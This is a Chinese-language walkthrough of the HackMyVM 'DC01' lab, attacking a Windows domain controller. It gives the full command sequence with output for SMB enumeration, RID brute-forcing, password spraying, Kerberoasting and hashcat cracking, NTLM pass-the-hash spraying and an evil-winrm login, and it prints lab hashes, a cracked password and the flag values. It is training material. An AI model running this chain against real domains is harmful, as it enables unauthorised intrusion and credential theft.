20.DC01
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=DC01
难度:⭐️⭐️⭐️⭐️
知识点:SMB匿名登录、RID枚举、SPN
好久没打windwos靶机了。这是我在hackmyvm上打的第一个windows靶机
2. 信息收集
192.168.56.128:445 open
192.168.56.128:88 open
192.168.56.128:139 open
192.168.56.128:135 open
[\*] alive ports len is: 4
start vulscan
[\*] NetBios 192.168.56.128 [+] DC:SOUPEDECODE\DC01
[\*] NetInfo
[\*]192.168.56.128
[->]DC01
[->]192.168.56.128
nmap -sC -sV 192.168.56.128 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:03 CST
Nmap scan report for 192.168.56.128
Host is up (0.00030s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 20:05:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn\_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|\_http-title: Not Found
|\_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn\_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:08:32:AA (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|\_ Message signing enabled and required
|\_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:08:32:aa (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-19T20:05:57
|\_ start\_date: N/A
|\_clock-skew: 14h59m58s
可以发现目标运行的服务有Kerberos、LDAP、SMB 这些都是windows域控的特征
域名 SOUPEDECODE
先把域名配置进/etc/hosts
192.168.56.128 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL
3. SMB
作者开放了139 445端口,很明显的SMB特征
利用smbmap 枚举SMB服务 检测是否存在匿名登录或者来宾登录
smbmap -u anonymous -H SOUPEDECODE.LOCAL
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 1 SMB session(s)
[+] IP: 192.168.56.128:445 Name: soupedcode.loacl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
发现 IPC$ 是可以读取的
发现是可以匿名登录的,我们可以利用这个用户 进行相对标识符(RID)暴力枚举出域内的其他用户
crackmapexec smb SOUPEDECODE.LOCAL -u 'anonymous' -p '' --rid-brute > rid_bruteforce.txt
cat rid\_bruteforce.txt | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > valid\_users.txt
通过rid枚举 获取了1000多个用户名
我们可以利用这些用户进行ASREPRoasting 攻击,但是都失败了。因为所有这些帐户都设置了 Kerberos 预身份验证所需的属性
4. SMB密码喷射
┌──(root㉿kali)-[/home/kali/hmv/DC01]
└─# crackmapexec smb SOUPEDECODE.LOCAL -u valid\_users.txt -p valid\_users.txt --no-bruteforce
SMB SOUPEDECODE.LOCAL 445 DC01 [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\DC01$:DC01$ STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\bmark0:bmark0 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\otara1:otara1 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\eyara3:eyara3 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\pquinn4:pquinn4 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\jharper5:jharper5 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\bxenia6:bxenia6 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\gmona7:gmona7 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\oaaron8:oaaron8 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\pleo9:pleo9 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\evictor10:evictor10 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\bgavin12:bgavin12 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\ndelia13:ndelia13 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\akevin14:akevin14 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\kxenia15:kxenia15 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\ycody16:ycody16 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\qnora17:qnora17 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\dyvonne18:dyvonne18 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\qxenia19:qxenia19 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\rreed20:rreed20 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\icody21:icody21 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\ftom22:ftom22 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\ijake23:ijake23 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\rpenny24:rpenny24 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\jiris25:jiris25 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\colivia26:colivia26 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\pyvonne27:pyvonne27 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\zfrank28:zfrank28 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
成功获取到了一对用户密码
ybob317:ybob317
枚举 Kerberos 服务主体名称(SPNs)
利用impacket-GetUserSPNs 枚举用户的服务帐户信息,然后使用这些 SPN 获取 Kerberos 服务票证(TGT),借助TGT我们可以向TGS请求获取TGS 并访问对应的服务
在枚举这些账户之前,我们需要先将攻击机的时间与域控的时间同步,不然会连接失败
timedatectl set-ntp off
rdate -n 192.168.56.128
impacket-GetUserSPNs SOUPEDECODE.LOCAL/ybob317 -dc-ip 192.168.56.128 -usersfile valid\_users.txt -request -outputfile spn-users.tgs
5. hashcat破解
获取到了目标上服务账户的TGS后可以利用hashcat进行爆破
hashcat -a 0 -m 13100 spn-users.tgs /usr/share/wordlists/rockyou.txt
$krb5tgs$23$\*file\_svc$SOUPEDECODE.LOCAL$file\_svc\*$819b74fc74d654f64b4ffc d59fcaffa8$1b2935d454f2797b08b5e5e3b1c9e093b5982e38edfb66c99f2264bcfa472 84eaccdebc1bd926bde0a24db8ff34869da0d52fdfcaca2fea7e6c3b5476b5c4e231c842 616b12bf97e643c060983421dd1cf6f358f0569f4214516f0eec01111e543b0035a5dc28 332619c22e939a86e5a08fa586f06aa8e2c3c553d79057cfde0f60e99a072ee8edbee941 2043b665fb117284513fb9c78b212af0d8447c6f96ff2cd75e921fda971125a358ac5029 35ad8f451ef5a441514b331e41196310c20235f38849402bb94d4d7e505d249a3d961a1d fecb3e11f7fc395ec3a4d49fb67d44a0c56b46a8bbea697b766bc493b1de8c79428efae7 1ef27b1ac43ebc85be78d2829dcd0700b09333bfe841a458c90fbba29bd2d997e7b8a5c6 174104985675bd8e6b78241ee114b15f5e57b66e35467aa89d827cae400c0cf7618acae7 909eaf536dc1e5cceadb028c5113e269d4de9c75703cc3e8c71883a981a233d7564715b2 7982284f3943da002846358961d7fb54de55b90ab02f41f0a357a083721601fc7a655815 a8cc6d20024639be7e610b7fe65969c06ea6efa388e203821c3480605be47e37c44226fc dabcec441cf0bfca7e7d99ffdc5ca0a28b8d0c6dd99fa55209dbec51eebd49faeebb1d80 1efda2c78f966e63767c541cee0d017581770e9780d0316e0173382e6774f95e00b3dda7 d0eb05f7766b1f76726eb26395561cd9c2d55af8057cc35bfb7b2468006d80ab8c2b68ef 0281659e598f117bf0d2a57179d4e203256374e1dbb20dfaafd40316c508fc88ac2ccb53 658ec19d6439f5a2956fc76e24ad09b4ecd452022758f79a0a0878c60e21ceb0059a22dc f5965012e9e9a0dab3222180880e0f5da3c0aaddb76587a7452ce2a37b21d7f68d097ef7 8b25fab43f43d60c59c2b48c9c8542e9c05099ff1a59c66c66731915e3ceddb579ee2dca 663270904eec929004bb6b9081a37ceb9d6848fed0ce388721ceafe05175a8564b262c04 3244f90d01d9a51c3291fe4f16091b80ddf883e14e4f2531afb77d25a41f18cbb2b30de0 f9ecd778821ecb2526041398178b3b58ac0057d0ebba808d6845a4353fdbcd012d9a0887 4f7e4c24c1ad40cf2c65b053bc056a1479fbc1cb84140c34ec1ead95dd5555794c3c1c66 57b2b8f5c4f47b2fbd0889dac1ae71dc8f8abdd1ac9ae13d9e2b1192d191811bb6a38f31 62ea4baf2322b1b38cd6bbf6662c6920a2c71d6e72ac0686cd2aecc7f9f54b499b194f7f 6ee8ca01f792ff0a784641ea5efed8c0940314efc87fbcdb997e311cc48e95f766d2c6a3 25ece96089d7ca723195f9ff8812cb807d039d4345ba7def5903ed5d19f995f1720fe3e6 a3709d01977f086f0fe351e9a767d5ccbc2e9b92bb29715ab0edc32cb800decdbcdf9977 e3558992782afdd7e56b65e703e1360117af01e8c96149ad27525f9b45b62b0b4a6ea407 c0a4162789879307cfd7e6cd62ccf01e8ff73:Password123!!
成功获取到了file_svc用户的密码
file\_svc:Password123!!
看这个名字就知道与文件服务相关
6. smb检测一下
crackmapexec smb SOUPEDECODE.LOCAL -u file\_svc -p 'Password123!!' --shares
可以发现里面有一个backup 共享
7. smbclient连接
smbclient -U 'filesvc' //SOUPEDECODE.LOCAL/backup
Password for [WORKGROUP\file\_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jun 18 01:41:17 2024
.. DR 0 Tue Jun 18 01:44:56 2024
backup\_extract.txt A 892 Mon Jun 17 16:41:05 2024
12942591 blocks of size 4096. 10958701 blocks available
smb: \> ls -la
NT\_STATUS\_NO\_SUCH\_FILE listing \-la
smb: \> dir -a
NT\_STATUS\_NO\_SUCH\_FILE listing \-a
smb: \> ls -a
NT\_STATUS\_NO\_SUCH\_FILE listing \-a
smb: \> ls
. D 0 Tue Jun 18 01:41:17 2024
.. DR 0 Tue Jun 18 01:44:56 2024
backup\_extract.txt A 892 Mon Jun 17 16:41:05 2024
12942591 blocks of size 4096. 10958701 blocks available
smb: \> get backup\_extract.txt
getting file \backup\_extract.txt of size 892 as backup\_extract.txt (58.1 KiloBytes/sec) (average 58.1 KiloBytes/sec)
smb: \> exit
cat backup\_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
获取到了一些目标服务账户的NTLM 密码哈希值,利用这些hash搭配前面的用户名单进行枚举,检查是否出现任何重复使用的密码
Warning
在实际渗透测试中,根据环境中的帐户锁定策略限制密码喷射尝试的次数至关重要。这种预防措施有助于防止敏感账户被意外锁定,这可能会干扰我们客户的运营。
cat backup\_extract.txt | cut -d '¥' -f1 > names.txt
cat backup\_extract.txt | cut -d ':' -f4 > hashes.txt
crackmapexec smb SOUPEDECODE.LOCAL -u valid\_users.txt -H hashes.txt | grep -v '[-]'
成功枚举出FileServer$ 用户,这表示我们可以通过这个用户连接到DC01,因为DC对这个用户托管了共享的权限,所以说肯定是可以连接DC01的
8. WinRM 连接DC01
evil-winrm -i 192.168.56.128 -u "FileServer$" -H e41da7e79a4c76dbd9cf79d1cb325559
获取fileserver$ 用户在域控主机上的权限。
whoami /all
USER INFORMATION
----------------
User Name SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers Group S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
可以发现该用是Administrators组的用户
那么我们就不需要提权了
直接读flag
\*Evil-WinRM\* PS C:\Users\FileServer$\Documents> type C:\Users\ybob317\Desktop\user.txt
6bab1f09a7403980bfeb4c2b412be47b
\*Evil-WinRM\* PS C:\Users\FileServer$\Documents> type C:\Users\administrator\desktop\root.txt
a9564ebc3289b7a14551baf8ad5ec60a